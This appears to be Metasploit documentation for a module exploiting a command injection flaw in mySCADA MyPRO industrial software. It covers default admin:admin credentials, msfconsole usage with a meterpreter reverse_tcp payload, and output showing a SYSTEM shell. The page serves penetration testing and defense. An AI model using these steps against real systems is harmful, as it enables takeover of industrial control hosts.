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GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/scada/
Views: 1904

Vulnerable Application

Vulnerability Description

This module exploits a command injection vulnerability in mySCADA MyPRO <= v8.28.0 (CVE-2023-28384).

An authenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which will get executed in the context of NT AUTHORITY\SYSTEM. This module uses the default admin:admin credentials, but any account configured on the system can be used to exploit this issue.

Versions <= 8.28.0 are affected. CISA published ICSA-23-096-06 to cover the security issues. The official changelog for the updated version, v8.29.0, is available here, although it only mentions a "General security improvement" without further details.

Vulnerable Application Installation

A trial version of the software can be obtained from the vendor. For the product to work correctly, the project and log directories need to be configured first, which can be done through the web inteface (navigate to System > Storage).

Successfully tested on

  • mySCADA MyPRO 8.28.0 on Windows 10 22H2

  • mySCADA MyPRO 8.27.0 on Windows 10 22H2

  • mySCADA MyPRO 8.26.0 on Windows 10 22H2

Verification Steps

  1. Install the application

  2. Configure the project and log paths (System > Storage in the web interface, running by default on TCP ports 80 & 443)

  3. Start msfconsole and run the following commands:

msf6 > use exploit/windows/scada/mypro_cmdexe [*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp msf6 exploit(windows/scada/mypro_cmdexe) > set RHOSTS <IP> msf6 exploit(windows/scada/mypro_cmdexe) > exploit

You should get a meterpreter session in the context of NT AUTHORITY\SYSTEM.



The username of a MyPRO user (default: admin)


The associated password of the MyPRO user (default: admin)


Running the exploit against MyPRO v8.28.0 on Windows 10 22H2, using curl as a fetch command, should result in an output similar to the following:

msf6 exploit(windows/scada/mypro_cmdexe) > exploit [*] Started reverse TCP handler on [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. [*] Checking credentials... [+] Credentials are working. [*] Sending command injection... [*] Sending stage (201798 bytes) to [*] Meterpreter session 12 opened ( -> at 2024-07-23 23:38:12 -0400 [*] Exploit finished, check thy shell. meterpreter > shell Process 2632 created. Channel 1 created. Microsoft Windows [Version 10.0.19045.4651] (c) Microsoft Corporation. All rights reserved. C:\WINDOWS\system32>whoami whoami nt authority\system